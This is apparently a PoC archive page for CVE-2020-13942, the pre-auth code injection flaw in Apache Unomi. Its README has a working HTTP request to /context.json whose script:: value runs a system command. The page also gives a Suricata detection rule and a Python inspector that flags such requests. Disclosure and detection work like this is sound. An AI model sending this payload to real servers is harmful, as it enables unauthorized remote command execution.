POC details: e077f0f8356b270d53e40aea61e8546c25edf227

Source
Related vulnerability
Title: Apache Unomi injection vulnerability (CVE-2020-13942)
Description: Apache Unomi is an open-source customer data platform from the US-based Apache Software Foundation. The platform is written mainly in Java. Apache Unomi versions before 1.5.2 contain an injection vulnerability: malicious OGNL or MVEL scripts can be injected through the public /context.json endpoint.
Introduction
# CVE-2020-13942 Apache Unomi pre-auth RCE

***CVE-2020-13942 exploit***

```http
POST /context.json HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json
Content-Length: 200

{"filters":[{"id" : "test","filters": [{"condition": {"parameterValues": {"test": "script::Runtime.getRuntime().exec('whoami')"},"type":"profilePropertyCondition"}}]}],"sessionId": "test"}
```

***CVE-2020-13942 Detection rules***

```
alert http any any -> any any (msg:"ET EXPLOIT CVE-2020-13942 Apache Unomi pre-auth RCE"; flow:established,to_server; content:"POST"; http_method; content:"/context.json"; http_uri; content:"Runtime.getRuntime()"; http_client_body; nocase; content:".exec("; http_client_body; nocase; reference:url,twitter.com/chybeta/status/1328912309440311297; reference:cve,2020-13942; classtype:attempted-admin; sid:2031120; rev:2; metadata:affected_product Web_Server_Applications, attack_target Client_Endpoint, created_at 2020_11_18, former_category EXPLOIT, signature_severity Major, updated_at 2020_11_18;)
```
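The Suricata rule above keys on two literal strings in the request body. As an added, defender-side example (not part of the PoC README or of the Unomi project), the Python below reimplements the rule's conditions for a single HTTP request and adds a stricter structural check that the signature alone does not give you: it parses the JSON body and flags any value under a condition's `parameterValues` that begins with the `script::` prefix used in the PoC body. The three request bodies are constructed for this example; the names `matches_suricata_rule`, `find_script_values` and `inspect_request` are this example's own.

```python
"""Inspect /context.json requests for the CVE-2020-13942 pattern (added example).

Two checks are applied per request:
  1. the same content matches as ET sid:2031120 (POST, /context.json in the
     URI, "Runtime.getRuntime()" and ".exec(" in the body, case-insensitive);
  2. a structural check: any string under a parameterValues object whose
     value starts with "script::", the prefix the PoC body relies on.
"""
import json
from typing import Any, Dict, Iterator, List, Tuple

# Body keywords from the Suricata rule; both carry "nocase", so compare lowercased.
RULE_BODY_KEYWORDS = ("runtime.getruntime()", ".exec(")
SCRIPT_PREFIX = "script::"


def matches_suricata_rule(method: str, uri: str, body: str) -> bool:
    """True when a request satisfies every match condition of sid:2031120."""
    if method.upper() != "POST" or "/context.json" not in uri:
        return False
    lowered = body.lower()
    return all(keyword in lowered for keyword in RULE_BODY_KEYWORDS)


def _walk(node: Any, path: str) -> Iterator[Tuple[str, Any]]:
    """Yield (json-path, value) for every leaf of a parsed JSON document."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from _walk(value, f"{path}[{index}]")
    else:
        yield path, node


def find_script_values(body: str) -> List[Tuple[str, str]]:
    """Return (path, value) for each string under a parameterValues object
    that starts with the script:: prefix. A non-JSON body yields [] rather
    than raising, so the caller can still fall back to the signature check."""
    try:
        document = json.loads(body)
    except (ValueError, TypeError):
        return []
    hits = []
    for path, value in _walk(document, "$"):
        if ".parameterValues." in path and isinstance(value, str) \
                and value.startswith(SCRIPT_PREFIX):
            hits.append((path, value))
    return hits


def inspect_request(method: str, uri: str, body: str) -> Dict[str, Any]:
    """Combine both checks into one verdict for a single HTTP request."""
    script_hits = find_script_values(body)
    signature_hit = matches_suricata_rule(method, uri, body)
    return {
        "signature_match": signature_hit,
        "script_values": script_hits,
        "suspicious": signature_hit or bool(script_hits),
    }


# Constructed sample bodies: the PoC body from the README, a body carrying a
# script:: value that contains none of the rule's keywords (only the structural
# check catches it), and a benign profilePropertyCondition filter.
POC_BODY = ('{"filters":[{"id":"test","filters":[{"condition":{"parameterValues":'
            '{"test":"script::Runtime.getRuntime().exec(\'whoami\')"},'
            '"type":"profilePropertyCondition"}}]}],"sessionId":"test"}')
SCRIPT_ONLY_BODY = ('{"filters":[{"id":"t","filters":[{"condition":{"parameterValues":'
                    '{"p":"script::1+1"},"type":"profilePropertyCondition"}}]}],'
                    '"sessionId":"s"}')
BENIGN_BODY = ('{"filters":[{"id":"t","filters":[{"condition":{"parameterValues":'
               '{"propertyName":"properties.age","comparisonOperator":"greaterThan",'
               '"propertyValueInteger":18},"type":"profilePropertyCondition"}}]}],'
               '"sessionId":"s"}')

if __name__ == "__main__":
    for name, body in (("poc", POC_BODY), ("script-only", SCRIPT_ONLY_BODY),
                       ("benign", BENIGN_BODY)):
        print(name, inspect_request("POST", "/context.json", body))
```

The structural check is the one worth keeping in a WAF or log-review script: it is independent of which Java class the script names, while the signature only fires on the exact `Runtime.getRuntime()` / `.exec(` strings. Content-Length is ignored on purpose; the body is inspected as received.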
File snapshot

```
[4.0K] /data/pocs/e077f0f8356b270d53e40aea61e8546c25edf227
└── [1.1K] README.md

0 directories, 1 file
```
Cached for you by the Shenlong bot.
Remarks
    1. It is recommended to access the PoC through the source first.
    2. If the source is no longer available or cannot be accessed, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.